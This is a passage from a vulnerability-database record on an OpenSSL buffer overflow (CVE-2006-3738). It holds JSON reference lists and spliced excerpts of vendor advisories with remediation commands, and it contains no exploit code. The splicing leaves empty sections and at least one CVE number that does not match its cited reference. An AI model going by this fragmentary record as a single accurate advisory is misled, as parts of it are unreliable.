            "url": "http://www.red-database-security.com/advisory/oracle_buffer_overflow_ons.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.red-database-security.com/advisory/oracle_xmldb_css2.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.integrigy.com/security-resources/analysis/oracle-cpu-january-2007/view"
          },
          {
            "trust": 0.3,
            "url": "http://www.integrigy.com/security-resources/analysis/cpu-january-2007-tech-matrix/view"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-01.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-03.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-06.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-02.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.oracle.com/index.html"
          },
          {
            "trust": 0.3,
            "url": "https://www.it-isac.org/postings/cyber/alertdetail.php?id=4092"
          },
          {
            "trust": 0.3,
            "url": "http://www.kb.cert.org/vuls/id/221788"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/457193"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/464470"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458657"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458036"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458006"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458037"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458005"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458041"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458038"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458475"
          },
          {
            "trust": 0.3,
            "url": "http://docs.info.apple.com/article.html?artnum=307177"
          },
          {
            "trust": 0.3,
            "url": "https://www.niscc.gov.uk)."
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4339"
          },
          {
            "trust": 0.2,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.2,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 0.2,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.2,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.2,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.2,
            "url": "http://www.mandriva.com/security/advisories"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3747"
          },
          {
            "trust": 0.2,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          },
          {
            "trust": 0.2,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.2,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.1,
            "url": "https://www.openssl.org/source/"
          },
          {
            "trust": 0.1,
            "url": "https://www.openssl.org/source/mirror.html):"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/9986131"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/vmtn/technology/security/security_response.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/security"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3589"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3589"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4980"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4339"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4980"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/3069097"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5135"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-07:08/openssl.patch.asc"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3738"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5135"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-07:08.openssl.asc"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-07:08/openssl.patch"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=119091888624735"
          },
          {
            "trust": 0.1,
            "url": "http://pgp.openpkg.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.openssl.org/"
          },
          {
            "trust": 0.1,
            "url": "http://www.openpkg.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.openpkg.org/security/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2002-0840"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3293"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0492"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3292"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3918"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0005"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0010"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2003-0542"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3291"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2002-0839"
          },
          {
            "trust": 0.1,
            "url": "http://h71000.www7.hp.com/openvms/products/ips/apache/csws_php.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-3357"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-3352"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2491"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5000"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3095"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555"
          },
          {
            "trust": 0.1,
            "url": "http://h71000.www7.hp.com/openvms/products/ips/apache/csws.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6388"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1891"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26977.html"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26866.html"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26864.html"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "101257"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#386964",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300",
            "ident": null
          },
          {
            "db": "BID",
            "id": "20249",
            "ident": null
          },
          {
            "db": "BID",
            "id": "22083",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "169663",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "50595",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "50543",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "53566",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "50535",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "59797",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "50560",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "101257",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "58346",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "50548",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964",
            "ident": null
          },
          {
            "date": "2007-01-17T00:00:00",
            "db": "CERT/CC",
            "id": "VU#221788",
            "ident": null
          },
          {
            "date": "2006-09-11T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620",
            "ident": null
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300",
            "ident": null
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "BID",
            "id": "20249",
            "ident": null
          },
          {
            "date": "2007-01-16T00:00:00",
            "db": "BID",
            "id": "22083",
            "ident": null
          },
          {
            "date": "2006-09-28T12:12:12",
            "db": "PACKETSTORM",
            "id": "169663",
            "ident": null
          },
          {
            "date": "2006-10-04T20:17:01",
            "db": "PACKETSTORM",
            "id": "50595",
            "ident": null
          },
          {
            "date": "2006-10-04T00:47:19",
            "db": "PACKETSTORM",
            "id": "50543",
            "ident": null
          },
          {
            "date": "2007-01-13T22:56:30",
            "db": "PACKETSTORM",
            "id": "53566",
            "ident": null
          },
          {
            "date": "2006-10-04T00:44:50",
            "db": "PACKETSTORM",
            "id": "50535",
            "ident": null
          },
          {
            "date": "2007-10-05T05:29:31",
            "db": "PACKETSTORM",
            "id": "59797",
            "ident": null
          },
          {
            "date": "2006-10-04T01:20:54",
            "db": "PACKETSTORM",
            "id": "50560",
            "ident": null
          },
          {
            "date": "2011-05-10T00:45:11",
            "db": "PACKETSTORM",
            "id": "101257",
            "ident": null
          },
          {
            "date": "2007-08-08T07:19:47",
            "db": "PACKETSTORM",
            "id": "58346",
            "ident": null
          },
          {
            "date": "2006-10-04T00:46:38",
            "db": "PACKETSTORM",
            "id": "50548",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2006-000594",
            "ident": null
          },
          {
            "date": "2006-09-28T18:07:00",
            "db": "NVD",
            "id": "CVE-2006-3738",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964",
            "ident": null
          },
          {
            "date": "2007-01-17T00:00:00",
            "db": "CERT/CC",
            "id": "VU#221788",
            "ident": null
          },
          {
            "date": "2007-02-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620",
            "ident": null
          },
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300",
            "ident": null
          },
          {
            "date": "2011-05-09T19:52:00",
            "db": "BID",
            "id": "20249",
            "ident": null
          },
          {
            "date": "2008-05-20T23:05:00",
            "db": "BID",
            "id": "22083",
            "ident": null
          },
          {
            "date": "2008-12-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2006-000594",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2006-3738",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "network",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "OpenSSL SSLv2 client code fails to properly check for NULL",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "Boundary Condition Error",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          }
        ],
        "trust": 0.3
      }
    }

    VAR-200609-1209

    Vulnerability from variot - Updated: 2025-12-21 22:00

    Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. A flaw in the OpenSSL library could allow a remote attacker to cause a denial of service on an affected application. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. Successfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. Oracle has released a Critical Patch Update advisory for January 2007 to address these vulnerabilities for supported releases. Earlier unsupported releases are likely to be affected by these issues as well. The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly expose affected computers to complete compromise. OpenSSL Security Advisory [28th September 2006]

    New OpenSSL releases are now available to correct four security issues.

    ASN.1 Denial of Service Attacks (CVE-2006-2937, CVE-2006-2940)

    Vulnerability

    Dr. S. N. Henson recently developed an ASN.1 test suite for NISCC (www.niscc.gov.uk). During the parsing of certain invalid ASN.1 structures an error condition is mishandled. This can result in an infinite loop which consumes system memory (CVE-2006-2937). (This issue did not affect OpenSSL versions prior to 0.9.7)

    1. Certain types of public key can take disproportionate amounts of time to process. This could be used by an attacker in a denial of service attack (CVE-2006-2940).

    Any code which uses OpenSSL to parse ASN.1 data from untrusted sources is affected. This includes SSL servers which enable client authentication and S/MIME applications.

    Acknowledgements

    The OpenSSL team thank Dr S. N. Henson of Open Network Security and NISCC for funding the ASN.1 test suite project. An attacker could send a list of ciphers to an application that uses this function and overrun a buffer (CVE-2006-3738).

    Acknowledgements

    The OpenSSL team thank Tavis Ormandy and Will Drewry of the Google Security Team for reporting this issue.

    SSLv2 Client Crash (CVE-2006-4343)

    Vulnerability

    A flaw in the SSLv2 client code was discovered.

    Acknowledgements

    The OpenSSL team thank Tavis Ormandy and Will Drewry of the Google Security Team for reporting this issue.

    Recommendations

    These vulnerabilities are resolved in the following versions of OpenSSL:

    • in the 0.9.7 branch, version 0.9.7l (or later);
    • in the 0.9.8 branch, version 0.9.8d (or later).

    OpenSSL 0.9.8d and OpenSSL 0.9.7l are available for download via HTTP and FTP from the following master locations (you can find the various FTP mirrors under https://www.openssl.org/source/mirror.html):

    o https://www.openssl.org/source/
    o ftp://ftp.openssl.org/source/
    

    The distribution file names are:

    o openssl-0.9.8d.tar.gz
      MD5 checksum: 8ed1853538e1d05a1f5ada61ebf8bffa
      SHA1 checksum: 4136fba00303a3d319d2052bfa8e1f09a2e12fc2
    
    o openssl-0.9.7l.tar.gz
      MD5 checksum: b21d6e10817ddeccf5fbe1379987333e
      SHA1 checksum: f0e4136639b10cbd1227c4f7350ff7ad406e575d
    

    The checksums were calculated using the following commands:

    openssl md5 openssl-0.9*.tar.gz
    openssl sha1 openssl-0.9*.tar.gz
    

    After upgrading make sure to recompile any applications statically linked to OpenSSL libraries and restart all applications that use OpenSSL.

    References

    URL for this Security Advisory: https://www.openssl.org/news/secadv_20060928.txt .

    Affected packages

    -------------------------------------------------------------------
     Package           /   Vulnerable   /                   Unaffected
    -------------------------------------------------------------------
    

    1 dev-libs/openssl < 0.9.8e-r3 >= 0.9.8e-r3

    Description

    Moritz Jodeit reported an off-by-one error in the SSL_get_shared_ciphers() function, resulting from an incomplete fix of CVE-2006-3738. A flaw has also been reported in the BN_from_montgomery() function in crypto/bn/bn_mont.c when performing Montgomery multiplication. A local attacker could perform a side channel attack to retrieve the RSA private keys.

    Resolution

    All OpenSSL users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8e-r3"
    

    References

    [ 1 ] CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 [ 2 ] CVE-2007-3108 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3108 [ 3 ] CVE-2007-5135 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5135

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200710-06.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

    License

    Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. rPath Security Advisory: 2006-0175-1 Published: 2006-09-28 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Unauthorized Access Updated Versions: openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1 openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1

    References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 http://issues.rpath.com/browse/RPL-613

    Description: Previous versions of the openssl package are vulnerable to multiple attacks. In particular, any connection that the mysql daemon will accept may be vulnerable. In the default configuration of mysql, that would be a local unauthorized access vulnerability, but mysql can be configured to listen for network connections from remote hosts, which would then enable remote unauthorized access. Any program that calls the SSL_get_shared_ciphers() function may be vulnerable.


    Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . Corrected: 2007-10-03 21:39:43 UTC (RELENG_6, 6.2-STABLE) 2007-10-03 21:40:35 UTC (RELENG_6_2, 6.2-RELEASE-p8) 2007-10-03 21:41:22 UTC (RELENG_6_1, 6.1-RELEASE-p20) 2007-10-03 21:42:00 UTC (RELENG_5, 5.5-STABLE) 2007-10-03 21:42:32 UTC (RELENG_5_5, 5.5-RELEASE-p16) CVE Name: CVE-2007-5135

    For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit . Background

    FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.

    II. Problem Description

    A buffer overflow addressed in FreeBSD-SA-06:23.openssl has been found to be incorrectly fixed.

    III.

    IV. Workaround

    No workaround is available, but only applications using the SSL_get_shared_ciphers() function are affected. Solution

    Perform one of the following:

    1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the correction date.

    2) To patch your present system:

    The following patch have been verified to apply to FreeBSD 5.5, 6.1, and 6.2 systems.

    a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

    fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch

    fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch.asc

    b) Execute the following commands as root:

    cd /usr/src

    patch < /path/to/patch

    cd /usr/src/secure/lib/libssl

    make obj && make depend && make && make install

    VI. Correction details

    The following list contains the revision numbers of each file that was corrected in FreeBSD.

    Branch Revision Path


    RELENG_5 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.11.2.3 RELENG_5_5 src/UPDATING 1.342.2.35.2.16 src/sys/conf/newvers.sh 1.62.2.21.2.18 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.11.2.1.4.2 RELENG_6 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.2.2 RELENG_6_2 src/UPDATING 1.416.2.29.2.11 src/sys/conf/newvers.sh 1.69.2.13.2.11 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.2.1.2.1 RELENG_6_1 src/UPDATING 1.416.2.22.2.22 src/sys/conf/newvers.sh 1.69.2.11.2.22 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.6.2


    VII. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2006-2937 [2] to the problem.

    1. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2006-2940 [3] to the problem.

    2. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2006-3780 [4] to the problem.

    3. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2006-4343 [5] to the problem.


    References: [0] http://www.openssl.org/news/secadv_20060928.txt [1] http://www.openssl.org/ [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343


    For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG openpkg@openpkg.org" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org for details on how to verify the integrity of this advisory. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c00849540 Version: 1

    HPSBUX02186 SSRT071299 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2007-01-17 Last Updated: 2007-01-23

    Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access.

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with Apache running on HP-UX. These vulnerabilities could be exploited remotely to allow execution of arbitrary code, Denial of Service (DoS), or unauthorized access.

    References: CVE-2006-2940, CVE-2006-2937, CVE-2006-3738, CVE-2006-4343, CVE-2006-4339, CVE-2005-2969.

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, and B.11.31 running Apache-based Web Server prior to v.2.0.58.01

    BACKGROUND

    AFFECTED VERSIONS

    For IPv4: HP-UX B.11.00 HP-UX B.11.11 =========== hpuxwsAPACHE action: install revision A.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    For IPv6: HP-UX B.11.11 =========== hpuxwsAPACHE,revision=B.1.0.00.01 hpuxwsAPACHE,revision=B.1.0.07.01 hpuxwsAPACHE,revision=B.1.0.08.01 hpuxwsAPACHE,revision=B.1.0.09.01 hpuxwsAPACHE,revision=B.1.0.10.01 hpuxwsAPACHE,revision=B.2.0.48.00 hpuxwsAPACHE,revision=B.2.0.49.00 hpuxwsAPACHE,revision=B.2.0.50.00 hpuxwsAPACHE,revision=B.2.0.51.00 hpuxwsAPACHE,revision=B.2.0.52.00 hpuxwsAPACHE,revision=B.2.0.53.00 hpuxwsAPACHE,revision=B.2.0.54.00 hpuxwsAPACHE,revision=B.2.0.55.00 hpuxwsAPACHE,revision=B.2.0.56.00 hpuxwsAPACHE,revision=B.2.0.58.00 action: install revision B.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    HP-UX B.11.23

    hpuxwsAPACHE action: install revision B.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    END AFFECTED VERSIONS

    RESOLUTION

    HP has made the following software updates available to resolve the issue. Software updates for the Apache-based Web Server are available from: http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    HP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.58.01 or subsequent.

    Apache Update Procedure

    Check for Apache Installation


    To determine if the Apache web server from HP is installed on your system, use Software Distributor's swlist command. All three revisions of the product may co-exist on a single system. For example, the results of the command swlist -l product | grep -I apache hpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server

    Stop Apache


    Before updating, make sure the previous Apache binary is stopped. If Apache is not stopped, the installation would be successful but the new version would be prevented from starting until a later time. After determining which Apache is installed, stop Apache with the following commands: for hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop

    Download and Install Apache


    Download Apache from Software Depot. http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE Verify successful download by comparing the cksum with the value specified on the installation web page. Use SD to swinstall the depot. Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported.

    Removing Apache Installation


    The potential vulnerability can also be resolved by removing Apache rather than installing a newer revision. To remove Apache use both Software Distributor's "swremove" command and also "rm -rf" the home location as specified in the rc.config.d file "HOME" variables. %ls /etc/rc.config.d | \ grep apache hpapache2conf hpws_apache[32]conf

    MANUAL ACTIONS: Yes - Update plus other actions Install the revision of the product.

    PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

    HISTORY: rev.1 - 23 January 2007 Initial Release

    Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key

    Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

    \xa9Copyright 2007 Hewlett-Packard Development Company, L.P.

    Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

